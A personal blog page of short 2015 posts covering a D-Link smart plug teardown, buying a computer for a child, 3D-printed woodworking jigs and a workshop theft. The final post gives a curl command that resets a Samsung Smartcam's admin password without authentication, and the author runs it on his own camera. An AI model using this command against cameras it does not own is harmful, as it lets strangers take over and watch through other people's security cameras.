Pages

Tuesday, August 18, 2015

when a plug is not an endorsement

I wrote some years ago about ripping out some old Smarthome branded X10 compatible light switches. I should have kept one installed somewhere to remind me to not revisit the concept.

I'm being slowly sucked back into new ewaste items for the smarter home because the Samsung IP cameras I recently installed appear to be working happily. I was excited that I could bypass their apps trivially without ever downloading them.

The latest device to follow me home is a 'Wi-Fi Smart Plug' from D-Link.

The device is a surprisingly bulky box stuffed with a power board and a daughter board. The power board has the high-voltage side of the power supply for the electronics, a relay for controlling a load, and a PL8331 energy metering IC from Prolific.

The daughter board holds the Atheros AR1311 and the flash that make the box a computer. These parts also make the smart plug essentially indistinguishable from any of a thousand other products from a hundred other vendors all built on the same platform.

A clever soul posted a simple script to bypass all the appery associated with this gizmo but it may have been too much to hope for two purchases in a row to work out. I bought this gizmo at Micro Center. I don't know why I even go in that store. If there are two variants of a product in the wild, Micro Center is guaranteed to have the wrong one. If you want the vulnerable one, they have the patched one. If you want the secure one, they have the vulnerable one. It's all the proof I need that the LHC will find a luck particle someday.

My guess is that only the vulnerable devices were marketable and the demand for these boxes cratered one D-Link shipped one not worth making work. Perhaps Micro Center got someone else's overstock cheap.

Other intrepid souls have pursued the matter further. If I may paraphrase Newton -- if I have seen less far, it is because I could not be bothered to climb up to the shoulders of giants. This box goes straight to recycling.



Tuesday, August 11, 2015

alphabet by the numbers

Exciting times ahead as Silicon Valley fully innovates the chaebol model.

I had a long piece for you this morning about Alphabet pivoting away from Apple as role model to Samsung as role model. The punchline was that Alphabet has floated no fewer than two barges while Samsung manufactures barges with more interior space than Apple's old campus at 1 Infinite Loop.

The rest was a reminder that the Samsung Group is already an established player in automobiles, shipbuilding, consumer electronics, renewable energy, healthcare, aviation, and self-propelled artillery.

I concede the point that Alphabet companies dominate in internet search.

The piece ran off the rails. Every small research task, like tracking down sales of Samsung electric cars in 2013, slipped instead into a search for a new computer for my daughter.

My daughter turns seven this fall and she wants a new computer. She would like to use logo, control our printer, our Graphtec plotter, our 3d printer, and the milling machine. She would like to use her MIDI keyboard. She would like to use both latin and chinese characters. She is comfortable with our Macintoshes and with her iPad.

I would like the answer to be a touch screen laptop or a touch screen portable all-in-one of the type that Google, Samsung, Asus, and probably even the North Koreans now make but which Apple does not. I would also like the answer to be a machine that works properly offline, works without remote credentials, without signed code, and without requiring an app store.

MacOS is out (no touch). ChromeOS is out (no printing without credentials). Android is out (no non-Play browser with MIDI). iOS is out (requires an app store. No non-store browser with MIDI).

The best answer, somehow, may be Firefox on either Ubuntu or Windows 10. Best or not, I have not yet found a computer at any price that I can give my daughter without apologizing for it. With this task still looming over me, I guess I just don't care what Silicon Valley companies call themselves.



Monday, August 10, 2015

one bulb

I passed a Banana Republic in a shopping mall today. It's window bore the slogan "one bulb at a time" with the exhortation:

"If every US Household switched just one bulb to LED, the pollution reduction would be equal to removing 800,000 cars from the road. Let's brighten up the planet together."



The warmth in my heart when I read this was matched only by the warmth of the light on the display. The display was lit by a halogen reflector bulb.


Friday, August 7, 2015

laps and jigs

I told you last time about the loss of a bike I liked. The DC Metropolitan Police Department had some good news from me recently. I had not, in fact, been burgled after all. Thefts from detached structures, like my workshop, don't count as burglaries. They are just ordinary thefts. The good news, I suppose, is that the crime statistics for my neighborhood will reflect one less burglary.

The real good news is that the not-quite-burglar took just the bike and tried to wrench a cheap flat panel monitor off the wall. The milling machine went unmolested, the 3d printer unpurloined, and the oscilloscope appears to have been unobserved. The bicycle may have cost more per pound than other things in the workshop, but the value density per volume was really quite low.

I use a super-cheap CTC 3d printer (a knockoff of a knockoff of an old Makerbot replicator) and a small Sherline 5410 CNC mill to make lots of relatively small things. I make bike parts and car parts and things for my children. I make these though I have a large and growing backlog of larger carpentry, construction projects. Those wait because I'm a terrible carpenter.

I was taught, as a young engineering student, that you should not 'measure with micrometer, mark with chalk, and then cut with ax'. I would say that my cuts hew closer to ax had I never seen good ax work. Some of my cuts look like they were made by meteorite.

If I were a real artisan, I would just buckle down and practice. I might spend years first learning to build a quality workbench and then move on to the simple things that need to be built or repaired around my house. I'm not this kind of artisan. I don't think I could even be while I have small children.

My task of the week is to build a treehouse for my youngest son in time for his fall birthday. I have a design. I have the materials. I have the tools. I lack the traditional kind of workmanship that the project requires.

Some people drink courage from a bottle. I'm 3d printing courage. I am especially terrible at cross lap joints -- of which there are several in the treehouse I designed. I addressed this problem this time designing and 3d printing a lap joint gauge. It's great. The joints all came out perfectly.

a gauge for cross-lap joints

One of the best parts of this jig technology is that I don't need to fill my workshop with jigs. I can recycle them and print them again in future years. I have already pitched this jig. I have kept a 3d printed doweling jig that I now use all the time.

a doweling jig for 1x4 stock
My non-burglary didn't interfere with my ability to use the workshop (good news, said the police, no need to lift fingerprints for a simple theft!). I have taken it as a call to make sure that I get enough use out of it to make these occasional troubles seem inconsequential.

Monday, August 3, 2015

minor loss

I wrote in June about material science. My old bike and old car withstood time and environment in an impressive way. In the last two months, both have fallen to fellow man -- that third pillar of loss.

The BMW drove away with a dude at the wheel who never paid. The bike was stolen from my workshop last week.

I decided to up my camera game and install a few decent cameras in the workshop and the alley behind. I chose an indoor/outdoor Samsung Smartcam. I was looking for weatherproof camera that would work without a cloud service.

The Samsung seems to fit the bill. Good picture. Easy to install. Works without a cloud. Just right vulnerable. The box suggested that the camera worked with both viable operating systems -- Android and iOS. I hoped for a device that would work with the legacy Mac platform and bash. I was not disappointed.

The camera serves HTTP on port 80 but it wants some kind of activation. No problem! exploitee.rs  (by way of Google) told me that these cameras allow a user to smash the admin credentials. This will do the trick:

curl http://YOUR_CAMERA_IP_ADDRESS/classes/class_admin_privatekey.php --data 'data=NEW%3BYOUR_NEW_ADMIN_PASSWORD'

With this detail out of the way, the camera can serve 1920 x 1080 JPEG images at about a frame a second with this invocation:

curl -u admin:YOUR_NEW_ADMIN_PASSWORD --digest http://YOUR_CAMERA_IP_ADDRESS/cgi-bin/video.cgi?msubmenu=jpg

This was just what I wanted. Images in two minutes without reading a manual or visiting an app store. I expect the cameras work like homework on a snow day -- their happy functioning will practically guarantee no crime for a decade.